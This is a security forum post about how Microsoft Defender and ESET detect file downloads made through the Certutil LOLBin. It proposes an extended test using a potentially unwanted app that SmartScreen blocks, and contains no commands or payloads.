Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
Of LoLBins, 0-Days, ESET, and Microsoft Defender
Message
<blockquote data-quote="Andy Ful" data-source="post: 1083215" data-attributes="member: 32260"><p>The detection of Microsoft Defender is acceptable, because the Certutil LOLBin was used in the attacks many times and people rarely use it to download files. However, the detection could be improved by allowing files with good reputations. In the case of the test, the file should be allowed (has a good reputation), but the file with an unknown reputation might be blocked.</p><p></p><p>The detection of Eset in the test is also acceptable because the downloaded file has a good reputation.</p><p>I think that [USER=7463]@cruelsister[/USER]'s test can be extended as follows:</p><ol> <li data-xf-list-type="ol">Download the file that SmartScreen blocks in Edge (SmartScreen set to "Block potentially unwanted apps") by choosing "keep the file".</li> <li data-xf-list-type="ol">Check if the file from point 1 is undetected by Eset.</li> <li data-xf-list-type="ol">If points 1 and 2 are fulfilled, download the file again using the Certutil LOLBin.</li> </ol><p>The extended test is based on the rational idea that potentially unwanted apps downloaded via suspicious methods should be prevented. It is possible, that Eset will fail such a test.</p><p>The [USER=7463]@cruelsister[/USER]'s test shows that Microsoft Defender detection can be improved. The extended test (if Eset fails) can show that Eset's detection can be improved.</p></blockquote><p></p>
[QUOTE="Andy Ful, post: 1083215, member: 32260"] The detection of Microsoft Defender is acceptable, because the Certutil LOLBin was used in the attacks many times and people rarely use it to download files. However, the detection could be improved by allowing files with good reputations. In the case of the test, the file should be allowed (has a good reputation), but the file with an unknown reputation might be blocked. The detection of Eset in the test is also acceptable because the downloaded file has a good reputation. I think that [USER=7463]@cruelsister[/USER]'s test can be extended as follows: [LIST=1] [*]Download the file that SmartScreen blocks in Edge (SmartScreen set to "Block potentially unwanted apps") by choosing "keep the file". [*]Check if the file from point 1 is undetected by Eset. [*]If points 1 and 2 are fulfilled, download the file again using the Certutil LOLBin. [/LIST] The extended test is based on the rational idea that potentially unwanted apps downloaded via suspicious methods should be prevented. It is possible, that Eset will fail such a test. The [USER=7463]@cruelsister[/USER]'s test shows that Microsoft Defender detection can be improved. The extended test (if Eset fails) can show that Eset's detection can be improved. [/QUOTE]
Insert quotes…
Verification
Post reply
Top